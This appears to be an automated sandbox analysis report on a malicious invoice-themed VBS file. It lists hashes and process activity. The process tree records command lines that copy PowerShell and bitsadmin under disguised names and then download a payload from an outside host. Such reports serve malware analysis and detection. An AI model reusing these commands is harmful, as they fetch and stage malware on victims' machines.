Analysis
- max time kernel: 62s
- max time network: 23s
- platform: windows7_x64
- resource: win7
- submitted: 13-07-2020 07:25
Static task: static1
Behavioral task: behavioral1
- Sample: Fatt_cliente_02567110412.vbs
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: Fatt_cliente_02567110412.vbs
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Fatt_cliente_02567110412.vbs
- Size: 3KB
- MD5: 9faef390681779584e1b8133adae555e
- SHA1: cb3765ea99deb44f62e47c23411b19405fcc507d
- SHA256: 22c2b0edeb83c36ad3757ff81c922df3fcc124c7da452ace9e932eb0125ddc2c
- SHA512: 3faa7c7ef807d6c97b89730e5d1f0124c639addbcd96ef3f47ff0d567e7dddf34df3163bc7e0c463655f18db0e8b85ba1103c4fcc5fee3b468150056c4273cf2
- Score: 8/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description | pid | process | target process):
  PID 1104 wrote to memory of 1112 | 1104 | WScript.exe | cmd.exe
  PID 1104 wrote to memory of 1112 | 1104 | WScript.exe | cmd.exe
  PID 1104 wrote to memory of 1112 | 1104 | WScript.exe | cmd.exe
  PID 1104 wrote to memory of 1424 | 1104 | WScript.exe | cmd.exe
  PID 1104 wrote to memory of 1424 | 1104 | WScript.exe | cmd.exe
  PID 1104 wrote to memory of 1424 | 1104 | WScript.exe | cmd.exe
  PID 1104 wrote to memory of 832 | 1104 | WScript.exe | jzFO.exe
  PID 1104 wrote to memory of 832 | 1104 | WScript.exe | jzFO.exe
  PID 1104 wrote to memory of 832 | 1104 | WScript.exe | jzFO.exe
  PID 1104 wrote to memory of 832 | 1104 | WScript.exe | jzFO.exe
- Executes dropped EXE (1 IoC)
  Processes (pid | process):
  832 | jzFO.exe
Processes (process tree; indentation shows parent/child depth)
- C:\Windows\System32\WScript.exe (PID 1104, depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_02567110412.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID 1112, depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zjzFO.exe
  - C:\Windows\System32\cmd.exe (PID 1424, depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\jzFO.exe
  - C:\Users\Admin\AppData\Roaming\jzFO.exe (PID 832, depth 2)
    Command line: "C:\Users\Admin\AppData\Roaming\jzFO.exe" /transfer JxfqxV /download https://mzgotech.com/temha/02567110412/uk.png C:\Users\Admin\AppData\Roaming\uk.png
    Signatures: Executes dropped EXE